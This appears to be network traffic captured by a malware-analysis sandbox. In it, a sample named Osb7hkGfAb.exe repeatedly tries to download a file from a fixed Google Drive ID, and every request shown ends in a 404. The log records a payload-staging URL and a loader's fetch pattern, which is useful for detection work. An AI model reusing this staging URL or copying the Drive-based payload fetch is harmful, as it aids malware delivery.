                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:33 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-yW3So-caztg5D5AH01_Vlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                31 | 192.168.2.9 | 49742 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:34 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:35 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC6xy2g5oD9MlsZghyM24Cnra8ksW78bMI-cSf37RIpo3L8A6HRgyDrB1YwPmZV72M6yqr6P97U
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:34 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-UIFcNqTO4bQG0gTulio-8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:35 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rG3UxBMhPpR9REbHrfGU7g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                32 | 192.168.2.9 | 49743 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:35 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:36 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:36 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-zmQR1ZzgAdHGYAGisv00yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                33 | 192.168.2.9 | 49744 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:37 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:37 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTplvhlpSkaDDdu84SgxV6Jm9vxeHfVJ4Opaj8hp7mu_FSk4WskrPqY_u5k0ZT_avlV
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:37 GMT
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-BuUoHJHvmV5bNAkyCIqGOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:37 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FlJngLYcvJiziZMyx7r3XA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                34 | 192.168.2.9 | 49745 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:38 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:38 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:38 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-RzVym3p5z6MbdS4Phq1cKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                35 | 192.168.2.9 | 49746 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:39 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:39 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgT80GsH_rRwzIaQ0o-d2cJcaa_l-GxTdJs4pXNDlRSyLmL-kRrM-TuHPzJAXIwOYzPUKXWxnwo
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:39 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-SUdzpVuTCDr5A-kMOEId5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:39 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TteCXfzYcoOfjyOLvyZRiA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                36 | 192.168.2.9 | 49747 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:40 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:41 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:40 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: script-src 'nonce-AQ5U-R7DRRaS4VcnOhec0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                37 | 192.168.2.9 | 49748 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:41 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:42 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRruTxswkbqe_ZywVMhnsirG74YjX_yC1uUe8TnowlSORAQM0hGedBlWgN07nvbgT49HOLiKuo
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:41 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-tHQsnM7_kzIX5Uc_y39CeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:42 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="22wjOMkR7WpvpDNewf14Sw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                38 | 192.168.2.9 | 49749 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:42 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:43 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:43 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-mhS4qpka1digx4_We3zVvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


